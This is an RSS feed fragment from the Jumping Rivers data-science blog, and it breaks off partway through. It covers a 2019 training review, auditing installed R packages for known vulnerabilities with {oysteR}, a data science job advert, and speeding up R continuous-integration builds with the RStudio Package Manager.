&lt;a href = "https://www.jumpingrivers.com/blog/the-delayed-2019-training-review/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/the-delayed-2019-training-review/original.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Don’t we all miss 2019 (blame Covid for the long delay in this post). The days of going to work and seeing your work colleagues face to face - and for some of you, attending one of our on-site training courses! 2019 was a great year for us. Not only have we broken new boundaries, we have recruited new full-time staff which have furthermore contributed to the glowing success of the company. The new staff that joined &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; in 2019 are as follows -&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Deborah Washington, Project Operation Manager&lt;/li&gt;
&lt;li&gt;Anmol Hussain, Finance Officer&lt;/li&gt;
&lt;li&gt;Dr Rhian Davies, Data Scientist&lt;/li&gt;
&lt;li&gt;John McIntyre, Data Scientist&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You might be wondering, what &lt;strong&gt;EXACTLY&lt;/strong&gt; did 2019 bring for Jumping Rivers. Some interesting data that we have collected regarding the training courses we delivered, can be seen below:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Total number of training course attendees was &lt;strong&gt;1192&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Total number of R training course attendees was &lt;strong&gt;1070&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Total number of Python training course attendees was &lt;strong&gt;182&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Total number of Stan / Scala training course attendees was &lt;strong&gt;101&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Over &lt;strong&gt;100&lt;/strong&gt; courses were delivered&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To provide a visual representation of how the year went, here are some neat plots I have created using the {ggplot2} R package.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-the-delayed-2019-training-review"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="average-attendees-per-language"&gt;Average attendees per language&lt;/h2&gt;
&lt;img class="image-center" src="attendees_language.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;From the graph above, it can be seen that the average number of Python attendees per course was higher than the numv ber of R attendees per course. For courses, we typically cap the class size at around 12 to 15 people. However, we sometimes run larger courses, but there would be multiple trainers onsite. Stan and Scala courses typically have much small class sizes, usually around eight people, this reflects the additional complexity of programming and statistics.&lt;/p&gt;
&lt;h2 id="course-length"&gt;Course length&lt;/h2&gt;
&lt;img class="image-center" src="course_length.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;An interesting observation I have made from the graph above, is that two day courses seem more popular from a Python perspective. Conversely, even though two day courses are popular in R as well, regular 1 day courses seem to be the most prominent approach our clients take when learning R.&lt;/p&gt;
&lt;h2 id="r-training-courses"&gt;R training courses&lt;/h2&gt;
&lt;img class="image-center" src="r_courses.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;A very interesting area of my analysis centered around the type of R courses we deliver at Jumping Rivers. We offer courses in three main sectors - analytics, graphics and programming. The bar chart seen above gives us a great indication as to the courses that are most popular with our budding R enthusiasts! We offer introductory and more advanced level programming courses, likewise with our tidyverse courses that include &lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/"&gt;Data Wrangling in the Tidyverse&lt;/a&gt;, &lt;a href="https://www.jumpingrivers.com/training/course/r-tidyverse-programming-purrr-lists/"&gt;Functional Programming with {purrr}&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/r-text-mining-tidyverse-stringr-tidytext/" rel="external"&gt;Text Mining in R&lt;/a&gt;. If you wish to delve deeper into the courses that we offer and want a detailed guide as to what material is covered, go check out &lt;a href="https://www.jumpingrivers.com/training/all-courses/"&gt;our website&lt;/a&gt;! You will see that in addition to R and Python, we also offer courses in &lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan/" title="Stan"&gt;Stan&lt;/a&gt;, Scala and SQL. We have also recently introduced a new version control &lt;a href="https://www.jumpingrivers.com/training/course/intro-to-git/" title="Git course"&gt;Git course&lt;/a&gt;!&lt;/p&gt;
&lt;h2 id="shall-we-let-the-team-have-their-moment---yeah-why-not"&gt;Shall we let the team have their moment - yeah, why not?&lt;/h2&gt;
&lt;p&gt;A crucial aspect of Jumping Rivers is the team we have here. Each and every person does their job to grow the company and maintain the high standards we have placed on ourselves. Whether it be waking up early to catch a train to deliver a training course, or sitting on our laptops rigorously writing code day after day, we all go the extra mile to meet the needs of our clients and course attendees.&lt;/p&gt;
&lt;p&gt;The bar chart below is illustrates the number of courses ran by each presenter in 2019. For the sake of a more accurate depiction, it is worth noting that Rhian and myself (John) joined the company mid to late 2019, respectively&lt;/p&gt;
&lt;img class="image-center" src="number_courses.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;The race was tightly contested in terms of the number of courses taught, with Jamie pipping Theo at the final bend!&lt;/p&gt;
&lt;img class="image-center" src="total_attendees.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;Last but not least and in my opinion, the most important of all, is the number of attendees taught. Speaking on behalf of my colleagues and myself, knowing that you have aided the progression of individuals in their understanding of the new, cutting edge programming languages, is hugely rewarding. Jamie wins this one as well so on that note, I pronounce you, Lord Owen (who really hates this post)!&lt;/p&gt;
&lt;img class="image-center" src="jamie.jpeg" style="width:250px; class:image-center"&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/the-delayed-2019-training-review/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Detecting Security Vulnerabilities in R Packages</title><link>https://www.jumpingrivers.com/blog/r-package-vulnerabilities-security/</link><pubDate>Fri, 28 Aug 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-package-vulnerabilities-security/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-package-vulnerabilities-security/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-package-vulnerabilities-security/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;One of our main roles at &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; is to set-up and provide ongoing maintenance to R, Python and RStudio &lt;a href="https://www.jumpingrivers.com/posit/" rel="external"&gt;infrastructure&lt;/a&gt;. This typically involves ensuring software is up-to-date and making sure everything is running smoothly.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://ossindex.sonatype.org/" rel="external"&gt;OSS Index&lt;/a&gt; developed by Sonatype is a&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;free catalogue of open source components and scanning tools to help developers identify vulnerabilities, understand risk, and keep their software safe.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The &lt;a href="https://github.com/sonatype-nexus-community/oysteR" rel="external"&gt;{oysteR}&lt;/a&gt; package is an R interface to the OSS Index that allows users to scan their installed R packages. A few months ago, I stumbled across a fledgeling version of this package and decided to make a few contributions to help move the package from GitHub to CRAN. A few PRs later, I&amp;rsquo;m now a co-author and the package is on CRAN.&lt;/p&gt;
&lt;p&gt;Installing the &lt;code&gt;{oysteR}&lt;/code&gt; package is straightforward, just the usual &lt;code&gt;install.packages()&lt;/code&gt; dance:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;oysteR&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After loading the package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;oysteR&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can audit the installed R packages for security vulnerabilities via the command&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;audit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;audit_deps&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Which produces the output&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ Calling installed.packages(), this may take time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ── Calling sonatype API: https://www.sonatype.com/ ──&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# → Using Sonatype tokens&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ Calling API: batch 1 of 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ Calling API: batch 2 of 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ── Vulnerability overview ──&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ 218 packages were scanned&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ 190 packages were in the Sonatype database&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ 1 package contains known vulnerability&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ℹ A total of 1 known vulnerability was identified&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As the output suggests, this function performs a few steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Calls &lt;code&gt;installed.packages()&lt;/code&gt; to determine the installed packages on your machine. Although there are warnings about this taking a &lt;em&gt;little while&lt;/em&gt;, I’ve never had any issues.&lt;/li&gt;
&lt;li&gt;Splits the packages into batches of 128 and queries the Sonatype API. Note, I’ve registered for Sonatype to allow more API calls. This isn’t strictly necessary, but registering increases the number of API calls you can make - see the GitHub &lt;a href="https://github.com/sonatype-nexus-community/oysteR" rel="external"&gt;README&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Summarises the results. In above, a total of 218 packages were scanned, at least 190 were found in the Sonatype database, and a single vulnerability was identified.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Packages might not be on Sonatype for a variety of reasons. For example, you may have personal packages. In my case, I have a large number of Jumping Rivers &lt;a href="https://www.jumpingrivers.com/courses" rel="external"&gt;teaching related packages&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The million-pound question is, what is the vulnerability? To obtain a few more results, we can use&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_vulnerabilities&lt;/span&gt;(audit)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which returns a tibble given further details. In our case, the vulnerable package is&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://github.com/bhaskarvk/widgetframe" rel="external"&gt;{widgetframe}&lt;/a&gt;, version 0.3.1 (the current latest version)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;After consulting the &lt;a href="https://ossindex.sonatype.org/component/pkg:cran/widgetframe@0.3.1" rel="external"&gt;link provided&lt;/a&gt; by &lt;code&gt;get_vulnerabilites()&lt;/code&gt;, we see that the issue&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;was originally highlighted by &lt;a href="https://rud.is/b/2018/02/16/pym-js-library-vulnerability-in-widgetframe-package/" rel="external"&gt;Bob Rudis&lt;/a&gt; in 2018&lt;/li&gt;
&lt;li&gt;concerns “Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)”, which is basically not sanitising URLs&lt;/li&gt;
&lt;li&gt;the underlying Javascript package has been &lt;a href="https://github.com/bhaskarvk/widgetframe/pull/13" rel="external"&gt;updated&lt;/a&gt; thanks to a PR from Bob.&lt;/li&gt;
&lt;li&gt;but the R package is &lt;em&gt;still&lt;/em&gt; using the old package.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-r-package-vulnerabilities-security"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="vulnerabilities-in-r"&gt;Vulnerabilities in R&lt;/h3&gt;
&lt;p&gt;Right now the few vulnerabilities that have been detected within R packages typically involve a Javascript library that has been included. However, it would be a bit hopeful to assume these are the only vulnerabilities around. To paraphrase Donald Trump, “if we don’t look, then we won’t find,” so it is likely that security issues exist in other packages that contain other code, e.g. C++. As R gets more popular, I suspect that it will receive more and more attention from people with nefarious intentions. Particularly, as we push dashboards and documents to the web.&lt;/p&gt;
&lt;h3 id="summary"&gt;Summary&lt;/h3&gt;
&lt;p&gt;Including Javascript is amazingly easy - see this recent great &lt;a href="https://blog.r-hub.io/2020/08/25/js-r/" rel="external"&gt;blogpost&lt;/a&gt; from Maëlle Salmon and Garrick Aden-Buie for an excellent discussion. However, when we bundle external code within our package, we now need to ensure that we update the package at regular intervals. This brings a few challenges:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;for package authors, we need to ensure that our packages are updated regularly. If we decide to stop updating, that’s OK, but we need to let the users know.&lt;/li&gt;
&lt;li&gt;for CRAN. Currently, there is no mechanism to remove potentially dangerous packages - but this is the trade-off we have for not breaking builds.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ultimately the final responsibility lies with users (or their organisations), who need to take responsibility for the packages they use.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-package-vulnerabilities-security/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Job Opportunities: Data Scientist and Engineer</title><link>https://www.jumpingrivers.com/blog/job-opportunities-data-scientist-and-engineer/</link><pubDate>Fri, 14 Aug 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/job-opportunities-data-scientist-and-engineer/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/job-opportunities-data-scientist-and-engineer/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/job-opportunities-data-scientist-and-engineer/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; is a data science consultancy company focused on R and Python. We work across industries and throughout the world. We offer a mixture of training, modelling, and infrastructure support. Jumping Rivers is an &lt;a href="https://www.jumpingrivers.com/rstudio-full-service-certified-partner/" rel="external"&gt;RStudio Full Service Certified Partner&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Location:&lt;/strong&gt; We are based in &lt;a href="https://en.wikipedia.org/wiki/Newcastle_upon_Tyne" rel="external" title="Newcastle upon Tyne"&gt;Newcastle upon Tyne&lt;/a&gt;. However, since the creation of the company we have encouraged remote working. Half of the team are remote (Leeds, Lancaster, Edinburgh). To make remote working a possibility, you need a) a good internet connection and b) within a few hours of (train) travel to London or Edinburgh.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Deadline&lt;/strong&gt;: 31st August, 2020&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-job-opportunities-data-scientist-and-engineer"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="role-1-data-engineer"&gt;Role 1: Data Engineer&lt;/h2&gt;
&lt;p&gt;This role is suitable for anyone interested in deploying (Linux-based) data science services and contains two main elements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Client facing:&lt;/strong&gt; assess virtual servers &amp;amp; services. Identify potential issues or improvements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Internal:&lt;/strong&gt; Everyone(!) at Jumping Rivers uses Linux. Provide support on setting-up systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Depending on the interests of the applicant, getting involved with &lt;em&gt;training&lt;/em&gt; is also a possibility.&lt;/p&gt;
&lt;h3 id="essential-technical-requirements"&gt;Essential technical requirements&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Linux server administration&lt;/li&gt;
&lt;li&gt;Shell scripting&lt;/li&gt;
&lt;li&gt;Version control&lt;/li&gt;
&lt;li&gt;Relevant technical degree or equivalent experience (Sciences, server administration)&lt;/li&gt;
&lt;li&gt;Some experience in R&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="desirable-but-not-essential"&gt;Desirable (but not essential)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Experience with Python, HTML/CSS/JS&lt;/li&gt;
&lt;li&gt;Experience with static site generators&lt;/li&gt;
&lt;li&gt;Docker stack deployment (e.g., Docker Compose, Terraform, Packer)&lt;/li&gt;
&lt;li&gt;Continuous Integration and Deployment (e.g., GitLab CI, Travis)&lt;/li&gt;
&lt;li&gt;Authentication services (e.g., Active Directory, SAML, LDAP, OAuth)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="future-role-opportunities"&gt;Future role opportunities&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Opportunity to develop new orchestration and deployment pipelines for use in Artificial Intelligence and Machine Learning workloads.&lt;/li&gt;
&lt;li&gt;Maintaining remote Linux services both cloud-based and internal VPS&lt;/li&gt;
&lt;li&gt;Designing bespoke infrastructure solutions clients&lt;/li&gt;
&lt;li&gt;Training: develop and deliver courses&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To discuss this role, please email us at &lt;a href="mailto:careers@jumpingrivers.com" rel="external"&gt;careers@jumpingrivers.com&lt;/a&gt;. To apply, please send a short covering letter and CV. Please use &amp;ldquo;Data Engineer&amp;rdquo; as the subject.&lt;/p&gt;
&lt;h2 id="role-2-data-scientist"&gt;Role 2: Data Scientist&lt;/h2&gt;
&lt;p&gt;Technical duties:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Building web applications using R and Shiny&lt;/li&gt;
&lt;li&gt;Data analysis using R and/or Python&lt;/li&gt;
&lt;li&gt;Development of bespoke statistical algorithms&lt;/li&gt;
&lt;li&gt;Provide technical training&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Client contact:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Attend on-site client meetings (at some point in the future)&lt;/li&gt;
&lt;li&gt;Off-site meetings via video conference call&lt;/li&gt;
&lt;li&gt;Training on site (at some point in the future)&lt;/li&gt;
&lt;li&gt;Develop a plan of action for consultancy.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="essential-technical-requirements-1"&gt;Essential technical requirements&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Basic Shiny experience (your first interview question will be &amp;ldquo;show me a recent Shiny App&amp;rdquo;)&lt;/li&gt;
&lt;li&gt;Experience with the tidyverse&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="desirable-but-not-essential-1"&gt;Desirable (but not essential)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Knowledge of statistical and/or machine learning algorithms&lt;/li&gt;
&lt;li&gt;Experience with Python, HTML/CSS/JS&lt;/li&gt;
&lt;li&gt;git&lt;/li&gt;
&lt;li&gt;Linux experience&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To discuss this role, please email us at &lt;a href="mailto:careers@jumpingrivers.com" rel="external"&gt;careers@jumpingrivers.com&lt;/a&gt; . To apply, please send a short covering letter and CV. Please use &amp;ldquo;Data Scientist&amp;rdquo; as the subject.&lt;/p&gt;
&lt;h2 id="role-3-data-scientist-with-an-emphasis-on-training"&gt;Role 3: Data Scientist with an emphasis on training&lt;/h2&gt;
&lt;p&gt;Similar to Role 2, but with a stronger emphasis on training.&lt;/p&gt;
&lt;p&gt;To discuss this role, please email us at &lt;a href="mailto:careers@jumpingrivers.com" rel="external"&gt;careers@jumpingrivers.com&lt;/a&gt; . To apply, please send a short covering letter and CV. Please use &amp;ldquo;Data Scientist with training&amp;rdquo; as the subject.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/job-opportunities-data-scientist-and-engineer/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Speeding up your Continuous Integration Builds</title><link>https://www.jumpingrivers.com/blog/r-packages-travis-github-actions-rstudio/</link><pubDate>Thu, 25 Jun 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-packages-travis-github-actions-rstudio/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-packages-travis-github-actions-rstudio/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-packages-travis-github-actions-rstudio/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Continuous integration is an amazing tool when developing R packages. We push a change to the server, and a process is spawned that checks we haven’t done something silly. It protects us from ourselves! However this process can become slow, as typically the CI process starts with a blank virtual machine (VM).&lt;/p&gt;
&lt;p&gt;If you are using R, then the current most popular CI pipeline is &lt;a href="https://travis-ci.org/" rel="external"&gt;Travis CI&lt;/a&gt;, but there’s also &lt;a href="https://www.jenkins.io/" rel="external"&gt;Jenkins&lt;/a&gt;, GitHub Actions, &lt;a href="https://docs.gitlab.com/ee/ci/" rel="external"&gt;GitLab CI&lt;/a&gt;, &lt;a href="https://circleci.com/" rel="external"&gt;Circle CI&lt;/a&gt; and a few others. They all follow the same idea. Start a VM, install your R package, then run a bunch of checks. One obvious bottle neck is the “install your R package” step, as any R package may have a large number of dependencies.&lt;/p&gt;
&lt;p&gt;In a &lt;a href="https://www.jumpingrivers.com/blog/faster-r-package-installation-rstudio/" rel="external"&gt;recent post&lt;/a&gt;, we showed the different ways of speeding up package installation (worth checking this out if you find package installation/updating slow). In this post, we’ll discuss leveraging some of those techniques for our CI pipeline.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-r-packages-travis-github-actions-rstudio"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="rstudio-package-manager-rspm"&gt;RStudio Package Manager (RSPM)&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://rstudio.com/products/package-manager/" rel="external"&gt;RStudio package manager&lt;/a&gt; is perhaps the easiest way of speeding up your CI process. RSPM provides precompiled binaries for CRAN packages, which should ensure a faster install. To test this I made a simple package, with no functions, but a dependency on the {tidyverse}, .i.e. &lt;code&gt;Imports: tidyverse&lt;/code&gt; in the DESCRIPTION file. Then I started two travis CI jobs. The first had a &lt;code&gt;.travis.yml&lt;/code&gt; file&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;language: r
cache: packages
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The total time for this travis job was around twelve minutes.&lt;/p&gt;
&lt;p&gt;The second job had same two lines, but also an additional &lt;code&gt;before_install:&lt;/code&gt; line&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;before_install:
- echo &amp;#34;options(repos = c(CRAN = &amp;#39;https://packagemanager.rstudio.com/all/__linux__/xenial/latest&amp;#39;))&amp;#34; &amp;gt;&amp;gt; ~/.Rprofile.site
- echo &amp;#34;options(HTTPUserAgent = paste0(&amp;#39;R/&amp;#39;, getRversion(), &amp;#39; R (&amp;#39;,
paste(getRversion(), R.version[&amp;#39;platform&amp;#39;], R.version[&amp;#39;arch&amp;#39;], R.version[&amp;#39;os&amp;#39;]),
&amp;#39;)&amp;#39;))&amp;#34; &amp;gt;&amp;gt; ~/.Rprofile.site
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;While looking complicated, it is actually fairly simple. The first line adds the RStudio binary package repository to the &lt;code&gt;.Rprofile&lt;/code&gt;. The second adds an &lt;code&gt;HTTPUserAgent&lt;/code&gt; to the &lt;code&gt;.Rprofile&lt;/code&gt; to enable packages that are installed via &lt;code&gt;Rscript&lt;/code&gt; to also use the binary package versions. These few lines cut the travis build time from around 12 minutes to under 4 minutes.&lt;/p&gt;
&lt;p&gt;The above is an incredibly easy way to speed-up your CI steps and works with other CI systems. If you use GitHub Actions, then this has already been &lt;a href="https://github.com/r-lib/actions/blob/c2687dac11bca64e304f295084aa58050d90811d/.github/workflows/check-full.yaml#L24" rel="external"&gt;implemented&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;A couple of things to note&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The above code is for Ubuntu 16.04 Xenial. If you are using &lt;code&gt;18.04 bionic&lt;/code&gt;, then change in the obvious way&lt;/li&gt;
&lt;li&gt;There are few &lt;a href="https://docs.rstudio.com/rspm/admin/binaries.html#binary-packages" rel="external"&gt;different OSs&lt;/a&gt; available for RSPM&lt;/li&gt;
&lt;li&gt;If you are interested in using the RSPM in your own organisation, give us a shout - we’re RStudio Partners.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="other-methods"&gt;Other methods&lt;/h2&gt;
&lt;p&gt;There are three other possibilities for reducing your CI time.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The first is similar to the RStudio package manager and use binary builds, but this time use the Ubuntu versions provided by Michael Rutter. The general idea is to add a new Ubuntu package repository, then install packages via &lt;code&gt;apt install r-cran-*&lt;/code&gt;. Details are available at &lt;a href="https://cran.r-project.org/bin/linux/ubuntu/" rel="external"&gt;CRAN&lt;/a&gt;. Also see &lt;a href="http://dirk.eddelbuettel.com/blog/2020/06/22/#027_ubuntu_binaries" rel="external"&gt;Dirk Eddelbuettel’s&lt;/a&gt; recent blog post and youtube video for even more details.&lt;/li&gt;
